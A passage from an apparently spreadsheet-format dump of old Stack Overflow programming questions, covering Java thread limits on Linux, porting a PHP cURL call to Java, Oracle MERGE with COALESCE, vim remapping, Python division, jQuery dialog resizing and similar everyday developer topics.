&lt;p&gt;This seems to be specific to Java creating threads, as the C thread-limit program was able to create about 1.5k threads. Additionally, this doesn't happen with a Java 1.4 JVM... it can create over 1.4k threads, though they are obviously being handled differently with respect to the OS.&lt;/p&gt;
&lt;p&gt;In this case, the number of threads it's cutting off at is a mere 29 threads. This is testable with a simple Java program that just creates threads until it gets an error and then prints the number of threads it created. The error is a &lt;pre&gt;java.lang.OutOfMemoryError: unable to create new native thread&lt;/pre&gt;&lt;/p&gt;
&lt;p&gt;This seems to be unaffected by things such as the number of threads in use by other processes or users or the total amount of memory the system is using at the time. JVM settings like Xms, Xmx, and Xss don't seem to change anything either (which is expected, considering the issue seems to be with native OS thread creation).&lt;/p&gt;
&lt;p&gt;The output of "ulimit -a" is as follows:&lt;/p&gt;
&lt;pre&gt;
core file size        (blocks, -c) 0
data seg size         (kbytes, -d) unlimited
file size             (blocks, -f) unlimited
max locked memory     (kbytes, -l) 4
max memory size       (kbytes, -m) unlimited
open files                    (-n) 1024
pipe size          (512 bytes, -p) 8
stack size            (kbytes, -s) 10240
cpu time             (seconds, -t) unlimited
max user processes            (-u) 7168
virtual memory        (kbytes, -v) unlimited
&lt;/pre&gt;
&lt;p&gt;The user process limit does not seem to be the issue. Searching for information on what could be wrong has not turned up much, but &lt;a href="http://blogs.oracle.com/gverma/2008/03/redhat_linux_kernels_and_proce_1.html" rel="nofollow"&gt;this post&lt;/a&gt; seems to indicate that at least some Red Hat kernels limit a process to 300 MB of memory allocated for stack, and at 10 MB per thread for stack, it seems like the issue could be there (though it seems strange and unlikely as well).&lt;/p&gt;
&lt;p&gt;I've tried changing the stack size with "ulimit -s" to test this, but any value other than 10240 and the JVM does not start with an error of:&lt;/p&gt;
&lt;pre&gt;Error occurred during initialization of VM
Cannot create VM thread. Out of system resources.&lt;/pre&gt;
&lt;p&gt;I can generally get around Linux, but I really don't know much about system configuration, and I haven't been able to find anything specifically addressing this kind of situation. Any ideas on what system or JVM settings could be causing this would be appreciated.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edits&lt;/strong&gt;: Running the thread-limit program mentioned by &lt;a href="http://stackoverflow.com/questions/116640/low-single-process-thread-limit-in-red-hat-linux#116696"&gt;plinth&lt;/a&gt;, there was no failure until it tried to create the 1529th thread.&lt;/p&gt;
&lt;p&gt;The issue also did not occur using a 1.4 JVM (does occur with 1.6.0_02 and 1.6.0_04 JVMs, can't test with a 1.5 JVM at the moment).&lt;/p&gt;
&lt;p&gt;The code for the thread test I'm using is as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class ThreadTest {
   public static void main(String[] pArgs) throws Exception {
      try {
         // keep spawning new threads forever
         while (true) {
            new TestThread().start();
         }
      }
      // when out of memory error is reached, print out the number of
      // successful threads spawned and exit
      catch ( OutOfMemoryError e ) {
         System.out.println(TestThread.CREATE_COUNT);
         System.exit(-1);
      }
   }
   static class TestThread extends Thread {
      private static int CREATE_COUNT = 0;
      public TestThread() {
         CREATE_COUNT++;
      }
      // make the thread wait for eternity after being spawned
      public void run() {
         try {
            sleep(Integer.MAX_VALUE);
         }
         // even if there is an interruption, dont do anything
         catch (InterruptedException e) {
         }
      }
   }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If you run this with a 1.4 JVM it will hang when it can't create any more threads and require a kill -9 (at least it did for me).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;More Edit:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;It turns out that the system that is having the problem is using the LinuxThreads threading model while another system that works fine is using the NPTL model. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>cURL equivalent in JAVA</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am tasked with writing an authentication component for an open source &lt;code&gt;JAVA&lt;/code&gt; app.  We have an in-house authentication widget that uses &lt;code&gt;https&lt;/code&gt;.  I have some example &lt;code&gt;php&lt;/code&gt; code that accesses the &lt;code&gt;widget&lt;/code&gt; which uses &lt;code&gt;cURL&lt;/code&gt; to handle the transfer.  &lt;/p&gt;
&lt;p&gt;My question is whether or not there is a port of &lt;code&gt;cURL&lt;/code&gt; to &lt;code&gt;JAVA&lt;/code&gt;, or better yet, what base package will get me close enough to handle the task? &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;This is in a nutshell, the code I would like to replicate in JAVA:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$cp = curl_init();
$my_url = "https://" . AUTH_SERVER . "/auth/authenticate.asp?pt1=$uname&amp;amp;pt2=$pass&amp;amp;pt4=full";
curl_setopt($cp, CURLOPT_URL, $my_url);
curl_setopt($cp, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($cp);
curl_close($cp);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/116650/curl-equivalent-in-java#116725"&gt;Heath&lt;/a&gt;, I think you're on the right track, I think I'm going to end up using HttpsURLConnection and then picking out what I need from the response.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript to extract author/date from SVN keyword substitution</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;SVN keyword substition gives is not pretty. E.g.,&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Last updated: $Date$ by $Author$&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;yields&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Last updated: $Date: 2008-09-22
  14:38:43 -0400 (Mon, 22 Sep 2008) $ by
  $Author: cconway $"&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Does anybody have a Javascript snippet that prettifies things and outputs some HTML? The result should be more like:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Last update: 22 Sep 2008 by cconway&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;P.S. Is there a way to replace "cconway" with a display name?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Oracle: Is there a simple way to say "if null keep the current value" in merge/update statements?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a rather weak understanding of any of oracle's more advanced functionality but this should I think be possible.&lt;/p&gt;
&lt;p&gt;Say I have a table with the following schema:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MyTable
  Id INTEGER,
  Col1 VARCHAR2(100),
  Col2 VARCHAR2(100)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to write an sproc with the following &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PROCEDURE InsertOrUpdateMyTable(p_id in integer, p_col1 in varcahr2, p_col2 in varchar2)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which, in the case of an update will, if the value in p_col1, p_col2 is null will not overwrite Col1, Col2 respectively&lt;/p&gt;
&lt;p&gt;So If I have a record:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;id=123, Col1='ABC', Col2='DEF'
exec InsertOrUpdateMyTable(123, 'XYZ', '098'); --results in id=123, Col1='XYZ', Col2='098'
exec InsertOrUpdateMyTable(123, NULL, '098');  --results in id=123, Col1='ABC', Col2='098'
exec InsertOrUpdateMyTable(123, NULL, NULL);   --results in id=123, Col1='ABC', Col2='DEF'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there any simple way of doing this without having multiple SQL statements?  &lt;/p&gt;
&lt;p&gt;I am thinking there might be a way to do this with the Merge statement though I am only mildly familiar with it.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;
Cade Roux bellow suggests using COALESCE which works great!  &lt;a href="http://www.java2s.com/Code/Oracle/Conversion-Functions/COALESCEreturnsthefirstnonnullexpressionintheexpressionlist.htm" rel="nofollow"&gt;Here are some examples of using the coalesce kewyord.&lt;/a&gt;
And here is the solution for my problem:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MERGE INTO MyTable mt
    USING (SELECT 1 FROM   DUAL) a
    ON (mt.ID = p_id)
    WHEN MATCHED THEN
        UPDATE
           SET mt.Col1 = coalesce(p_col1, mt.Col1), mt.Col2 = coalesce(p_col2, mt.Col2)
    WHEN NOT MATCHED THEN
        INSERT (ID, Col1, Col2)
        VALUES (p_id, p_col1, p_col2);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Scrape multi-frame website</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm auditing our existing web application, which makes heavy use of &lt;a href="http://www.w3schools.com/HTML/html_frames.asp" rel="nofollow"&gt;HTML frames&lt;/a&gt;. I would like to download all of the HTML in each frame, is there a method of doing this with &lt;a href="http://www.gnu.org/software/wget/" rel="nofollow"&gt;wget&lt;/a&gt; or a little bit of scripting?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there an "anonymous" generic tag in C#, like '?' in Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Java, one can declare a variable parameterised by an "unknown" generic type, which looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Foo&amp;lt;?&amp;gt; x;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there an equivalent construct to this question-mark, in C#?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When have we any practical use for hierarchical namespaces in c++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can understand the use for one level of namespaces. But 3 levels of namespaces. Looks insane. Is there any practical use for that? Or is it just a misconception?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I (re-) map commands in vim?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I love vim and the speed it gives me. But sometimes, my fingers are too speedy and I find myself typing ":WQ" instead of ":wq" (on a German keyboard, you have to press shift to get the colon). Vim will then complain that 'W' is not an editor command.&lt;/p&gt;
&lt;p&gt;Is there some way to make W and Q editor commands?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to delete subdomain cookies?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If there is a cookie set for a subdomain, metric.foo.com, is there a way for me to delete the metric.foo.com cookie on a request to www.foo.com? The browser (at least Firefox) seems to ignore a Set-Cookie with a domain of metric.foo.com.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get a decimal value when using the division operator in Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For example, the standard division symbol '/' rounds to zero:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; 4 / 100
0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, I want it to return 0.04. What do I use?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best approach for sortable table with a lot of data</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On our web application, the search results are displayed in sortable tables.  The user can click on any column and sort the result.  The problem is some times, the user does a broad search and gets a lot of data returned.  To make the sortable part work, you probably need all the results, which takes a long time.  Or I can retrieve few results at a time, but then sorting won't really work well.  What's the best practice to display sortable tables that might contain lots of data?  &lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Thanks for all the advises. I will certainly going over these.&lt;/p&gt;
&lt;p&gt;We are using an existing Javascript framework that has the sortable table; "lots" of results means hundreds.  The problem is that our users are at some remote site and a lot of delay is the network time to send/receive data from the data center.  Sorting the data at the database side and only send one page worth of results at a time is nice; but when the user clicks some column header, another round trip is done, which always add 3-4 seconds.  &lt;/p&gt;
&lt;p&gt;Well, I guess that might be the network team's problem :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What can Services do under Windows?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone have a good guide to capabilities of Windows Services under XP? In particular, I am trying to find out what happens when a program being run as a service tries to open windows, but hasn't been given permission to interact with the desktop.&lt;/p&gt;
&lt;p&gt;Basically, I have a program that is/was a GUI application, that should be able to run as a service for long term background processing. Rewriting the program to not display the GUI elements when doing background processing is a major effort, so I'd like to see if there is just a way to ignore the UI elements. It is sort of working now, as long as too many windows aren't opened. I'm trying to figure out what limits I might be running into. Ideally, there would be an MSDN page that discusses this, but I've had no luck finding one yet.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Planning the flow of a program</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am already aware of UML but I want to look at all the options before I pick. Essentially I will need to have a way (preferably visual) to plan out the flow and actions of programs. They will all be web applications written in PHP or Python.&lt;/p&gt;
&lt;p&gt;What (preferably free) ways are there to plan a program in this way beyond UML and common flow charts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Wait until any of Future&lt;T&gt; is done</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have few asynchronous tasks running and I need to wait until at least one of them is finished (in the future probably I'll need to wait util M out of N tasks are finished).
Currently they are presented as Future, so I need something like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/**
 * Blocks current thread until one of specified futures is done and returns it. 
 */
public static &amp;lt;T&amp;gt; Future&amp;lt;T&amp;gt; waitForAny(Collection&amp;lt;Future&amp;lt;T&amp;gt;&amp;gt; futures) 
        throws AllFuturesFailedException
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there anything like this? Or anything similar, not necessary for Future. Currently I loop through collection of futures, check if one is finished, then sleep for some time and check again. This looks like not the best solution, because if I sleep for long period then unwanted delay is added, if I sleep for short period then it can affect performance.&lt;/p&gt;
&lt;p&gt;I could try using &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;new CountDownLatch(1)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and decrease countdown when task is complete and do &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;countdown.await()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;, but I found it possible only if I control Future creation. It is possible, but requires system redesign, because currently logic of tasks creation (sending Callable to ExecutorService) is separated from decision to wait for which Future. I could also override &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;T&amp;gt; RunnableFuture&amp;lt;T&amp;gt; AbstractExecutorService.newTaskFor(Callable&amp;lt;T&amp;gt; callable)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and create custom implementation of RunnableFuture with ability to attach listener to be notified when task is finished, then attach such listener to needed tasks and use CountDownLatch, but that means I have to override newTaskFor for every ExecutorService I use - and potentially there will be implementation which do not extend AbstractExecutorService. I could also try wrapping given ExecutorService for same purpose, but then I have to decorate all methods producing Futures.&lt;/p&gt;
&lt;p&gt;All these solutions may work but seem very unnatural. It looks like I'm missing something simple, like &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;WaitHandle.WaitAny(WaitHandle[] waitHandles)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in c#. Are there any well known solutions for such kind of problem?&lt;/p&gt;
&lt;p&gt;UPDATE:&lt;/p&gt;
&lt;p&gt;Originally I did not have access to Future creation at all, so there were no elegant solution. After redesigning system I got access to Future creation and was able to add countDownLatch.countdown() to execution process, then I can countDownLatch.await() and everything works fine.
Thanks for other answers, I did not know about ExecutorCompletionService and it indeed can be helpful in similar tasks, but in this particular case it could not be used because some Futures are created without any executor - actual task is sent to another server via network, completes remotely and completion notification is received.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get Django AutoFields to start at a higher number</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For our Django App, we'd like to get an &lt;code&gt;AutoField&lt;/code&gt; to start at a number other than 1.  There doesn't seem to be an obvious way to do this.  Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Upload files directly to Amazon S3 from ASP.NET application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My ASP.NET MVC application will take a lot of bandwidth and storage space. How can I setup an ASP.NET upload page so the file the user uploaded will go straight to Amazon S3 without using my web server's storage and bandwidth?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I unload a externally loaded SWF file from a SWFLoader component in Adobe Flex?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application that loads external SWF files and plays them inside a Adobe Flex / Air application via the &lt;a href="http://livedocs.adobe.com/flex/3/html/controls_15.html" rel="nofollow"&gt;SWFLoader Flex component&lt;/a&gt;. I have been trying to find a way to unload them from a button click event. I have Google'd far and wide and no one seems to have been able to do it without a hack. The combination of code I see people use is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;swfLoader.source = ""; // Removes the external link to the SWF.
swfLoader.load(null); // Forces the loader to try to load nothing.
// Note: At this point sound from the SWF is still playing, and
// seems to still be playing in memory.
flash.media.SoundMixer.stopAll();
// Stops the sound. This works on my development machine, but not 
// on the client's.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If the SWFs are closed (hidden) this way, eventually the program crashes.&lt;/p&gt;
&lt;p&gt;Any ideas? I have found tons of posts in various forums with people having the same problem. I assume I will get one wrong/incomplete answer here, and than my post will sink into nothingness as usual, but either way, thanks in advance!&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Edit 1&lt;/em&gt;:  I can't edit the actual SWF movies, they're created by the client. If I can't close any SWF opened through Flex, isn't that a problem with the Flex architecture? Is my only option sending the SWFs to the web browser?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I open Office 2007 files stored on a website?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a website where people can upload documents, and view them later at their convenience. I store the binary info along with the mime type in my db, and later just stream the binary content straight to the browser.&lt;/p&gt;
&lt;p&gt;This works for for every file type except Office 2007 files. When I try to view the Office 2007 files, I get a popup requesting credentials. After I dismiss the the dialog (by canceling), I get another popup like the one below:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://4.bp.blogspot.com/_U0AuZcqOces/SNgVYTB4rCI/AAAAAAAAAD8/_WT8BwTZwBQ/s400/office07popup.jpg"&gt;&lt;/p&gt;
&lt;p&gt;After also dismissing this dialog (by clicking "Yes"), the document finally opens. What gives? Does the browser really not know how to handle Office 2007 files? I checked the mime-type I'm saving, and everything looks correct. Any ideas on what I can do to get rid of these dialogs when trying to open a file?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to version control the build tools and libraries?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the recommendations for including your compiler, libraries, and other tools in your source control system itself?&lt;/p&gt;
&lt;p&gt;In the past, I've run into issues where, although we had all the source code, building an old version of the product was an exercise in scurrying around trying to get the exact correct configuration of Visual Studio, InstallShield and other tools (including the correct patch version) used to build the product.  On my next project, I'd like to avoid this by checking these build tools into source control, and then build using them. This would also simplify things in terms of setting up a new build machine -- 1) install our source control tool, 2) point at the right branch, and 3) build -- that's it.&lt;/p&gt;
&lt;p&gt;Options I've considered include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Copying the install CD ISO to source control - although this provides the backup we need if we have to go back to an older version, it isn't a good option for "live" use (each build would need to start with an install step, which could easily turn a 1 hour build into 3 hours).&lt;/li&gt;
&lt;li&gt;Installing the software to source control.  ClearCase maps your branch to a drive letter; we could install the software under this drive.  This doesn't take into account non-file part of installing your tools, like registry settings.&lt;/li&gt;
&lt;li&gt;Installing all the software and setting up the build process inside a virtual machine, storing the virtual machine in source control, and figuring out how to get the VM to do a build on boot.  While we capture the state of the "build machine" with ease, we get the overhead of a VM, and it doesn't help with the "make the same tools available to developers issue."&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It seems such a basic idea of configuration management, but I've been unable to track down any resources for how to do this.  What are the suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best practice for translating exceptions in C++/CLI wrapper class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing a .NET wrapper class for an existing native class which throws exceptions. What are the best practices for translating between native C++ exceptions and Managed exceptions? Catch and re-throw on a one-to-one basis (e.g. std::invalid_argument -&gt; System.System.ArgumentException)? Is there a mapping already drawn up somewhere?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to refactor in a branch without losing my mind?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I refactor my and other people's code &lt;strong&gt;all the time&lt;/strong&gt;.
When I work in a branch and not in Trunk, this sometimes results in some extremely painful merges, especially if I don't merge back to Trunk regularly (the code at the branch slowly shifts away from the Trunc, and when people modify Trunk I have to figure out manually how to apply this to the branch).&lt;/p&gt;
&lt;p&gt;The solutions I know are either &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Constantly merge to and from Trunk - reduces painful merges, but then why work in a branch at all?&lt;/li&gt;
&lt;li&gt;Whenever you need to refactor something, switch to Trunk, do the refactoring there and merge to your branch - I don't find this very practical, since the actual cost of switching environments for every refactoring is huge.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;What do you do?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Question about object-orientation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I had this questions since the time I learnt about object-oriented programming. Now, I have got a wonderful forum I thought of asking this.&lt;/p&gt;
&lt;p&gt;Lets say we are implementing an employee management application using EJB.&lt;/p&gt;
&lt;p&gt;Now, there are 2 ways of doing this.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Normally, we create entities (POJOs) which represent an employee. Then we create an EJB interface 'EmployeeManager' with add, delete, update, retrieve, retrieveAll methods. This way I could use 'employee' entity as a data transfer object.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;We call the EJB interface itself 'Employee'. Implementation could be called 'EmployeeImpl' which has &lt;em&gt;fields&lt;/em&gt; as well as method implementation (add, delete, update, retrieve, retrieveAll). If I am using a layered approach where my business logic needs access to employee details, I need to pass 'EmployeeImpl' (because it contains values).&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Which one do you think is the better way?&lt;/p&gt;
&lt;p&gt;I prefer the first one, because it 'looks' fine and does not feel awkward. like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;EmployeeMgr empMgr = // JNDI lookup;
Employee emp = new Employee();
empMgr.add(emp);
Employee employees[] = empMgr.retrieveAll();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where as the second one would look like (though I am not sure),&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Employee emp = // JNDI lookup;
emp.setName(); //set the properties
emp.add();
Employee employees[] = emp.retrieveAll();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see, the second one looks awkward.&lt;/p&gt;
&lt;p&gt;I request you guys to advise me on this.&lt;/p&gt;
&lt;p&gt;Thanks
manju&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Whats the best book/site/tutorial for learning object oriented php?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Im pretty familiar with procedural side of php, but I would like to learn the OO side of things. Can you guys suggest some (short) reads that would get me on my way?&lt;/p&gt;
&lt;p&gt;Would prefer online articles, to paper. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What tool do you use to do burndown charts?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;do you use a tool?  or just manually make them?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# - Why won't a fullscreen winform app ALWAYS cover the taskbar?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Windows Vista and C#.net 3.5, but I had my friend run the program on XP and has the same problem.&lt;/p&gt;
&lt;p&gt;So I have a C# program that I have running in the background with an icon in the SystemTray.  I have a low level keyboard hook so when I press two keys (Ctr+windows in this case) it'll pull of the application's main form.  The form is set to be full screen in the combo key press even handler:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;this.FormBorderStyle = FormBorderStyle.None;
this.WindowState = FormWindowState.Maximized;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So it basically works.  When I hit CTR+Windows it brings up the form, no matter what program I have given focus to.  But sometimes, the taskbar will still show up over the form, which I don't want.  I want it to always be full screen when I hit that key combo.&lt;/p&gt;
&lt;p&gt;I figure it has something to do with what application has focus originally.  But even when I click on my main form, the taskbar sometimes stays there.  So I wonder if focus really is the problem.  It just seems like sometimes the taskbar is being stubborn and doesn't want to sit behind my program.&lt;/p&gt;
&lt;p&gt;Anyone have any ideas how I can fix this?&lt;/p&gt;
&lt;p&gt;EDIT:  More details-
I'm trying to achieve the same effect that a web browser has when you put it into fullscreen mode, or when you put powerpoint into presentation mode.&lt;/p&gt;
&lt;p&gt;In a windows form you do that by putting the border style to none and maximizing the window.  But sometimes the window won't cover the taskbar for some reason.  Half the time it will.&lt;/p&gt;
&lt;p&gt;If I have the main window topmost, the others will fall behind it when I click on it, which I don't want if the taskbar is hidden.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I ignore ampersands in a SQL script running from SQL Plus?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a SQL script that creates a package with a comment containing an ampersand (&amp;amp;). When I run the script from SQL Plus, I am prompted to enter a substitute value for the string starting with &amp;amp;. How do I disable this feature so that SQL Plus ignores the ampersand?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to start IDLE (Python editor) without using the shortcut on Windows Vista?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to teach Komodo to fire up &lt;a href="http://en.wikipedia.org/wiki/IDLE%5F%28Python%29"&gt;IDLE&lt;/a&gt; when I hit the right keystrokes.  I can use the exact path of the shortcut in start menu in the Windows Explorer location bar to launch IDLE so I was hoping Komodo would be able to use it as well.  But, giving this path to Komodo causes it to say that 1 is returned.  This appears to be a failure as IDLE doesn't start up.&lt;/p&gt;
&lt;p&gt;I thought I'd avoid the shortcut and just use the exact path.  I go to the start menu, find the shortcut for IDLE, right click to look at the properties.  The target is grayed out, but says "Python 2.5.2".  The "Start in" is set to, "C:\Python25\".  The "Open File Location" button is also grayed out.&lt;/p&gt;
&lt;p&gt;How do I find out where this shortcut is really pointing?  I have tried starting python.exe and pythonw.exe both in C:\Python25, but neither starts up IDLE.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to manipulate pages while embedding Webkit?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Webkit-sharp to embed Webkit into an application and I need to hook certain links to perform actions in my app rather than their normal action.&lt;/p&gt;
&lt;p&gt;I've considered using Javascript to iterate over the anchor tags and replace the ones that match with the proper link, but I'm wondering if this is the best way.  Is there a preferred way of doing this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Trying to resize a jQuery dialog in IE6?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I thought I had seen a bug report about this on the jQuery site, but now I cannot find it. I'm trying to resize a dialog in IE6. But when the element is resized, the content and title bar don't resize down. They will resize up if the dialog is made larger, however. The result is that the close button ends up being cut off and the content is clipped if the user resize the dialog to be smaller. &lt;/p&gt;
&lt;p&gt;I've tried handling the resizeStop event and manually resizing the content and titlebar, but this can gave me weird results. The sizes and positions of elements in the content area were still off. Also, even though I resize the title bar, the close button still doesn't move back into view. Any ideas? If this is a bug in jQuery-ui, does anyone know a good workaround?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
  &amp;lt;title&amp;gt;Example of IE6 resize issue&amp;lt;/title&amp;gt;
  &amp;lt;link rel="stylesheet" type="text/css" href="http://ui.jquery.com/repository/latest/themes/flora/flora.all.css" /&amp;gt;
  &amp;lt;script src="http://www.google.com/jsapi"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script&amp;gt;        
    google.load("jquery", "1");        
    google.load("jqueryui", "1");        
    google.setOnLoadCallback(        
    function() {                
      $(document).ready(function()        
      {            
        $("#main-dialog").dialog();        
      });    
    });
    &amp;lt;/script&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
    &amp;lt;div id="main-dialog"&amp;gt;    
      This is just some simple content that will fill the dialog. This example is    
      sufficient to reproduce the problem in IE6. It does not seem to occur in IE7    
      or FF. I haven't tried with Opera or Safari.
    &amp;lt;/div&amp;gt;
&amp;lt;/body&amp;gt; 
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>ASP.NET TextBox control with label text in the background</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm creating a login page. I want to create ASP.NET TextBox controls that have "Username" and "Password" as their Text, but as soon as they receive focus, these words should disappear and whatever the user types should appear, just like normal textbox. If the user leaves it blank and tabs to the next textbox, then these words appear again. This will eliminate the need for having separate labels in front of the text boxes. I would appreciate if someone can share their expertise for doing this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you use the ellipsis slicing syntax in Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This came up in  &lt;a href="http://stackoverflow.com/questions/101268/hidden-features-of-python"&gt;Hidden features of Python&lt;/a&gt;, but I can't see good documentation or examples that explain how the feature works.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>RTF control for .Net 1.1 Windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone recommend a cheap and good RTF control for .Net 1.1 Windows development. It needs to be able to do print/preview and some basic text formatting, fonts etc but nothing too advanced.&lt;/p&gt;
&lt;p&gt;Cheers&lt;/p&gt;
&lt;p&gt;Andreas&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How would you implement a badge system like StackOverflow's?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Just wondering how you would do this.  Would you have some sort of process that scanned through all the actions that took place over the past X minutes?  Would you trigger a badge update check every time any action took place (up vote, down vote, tag, etc.)?  It seems like this would be a relatively expensive process one way or another.&lt;/p&gt;
</t>
  </si>
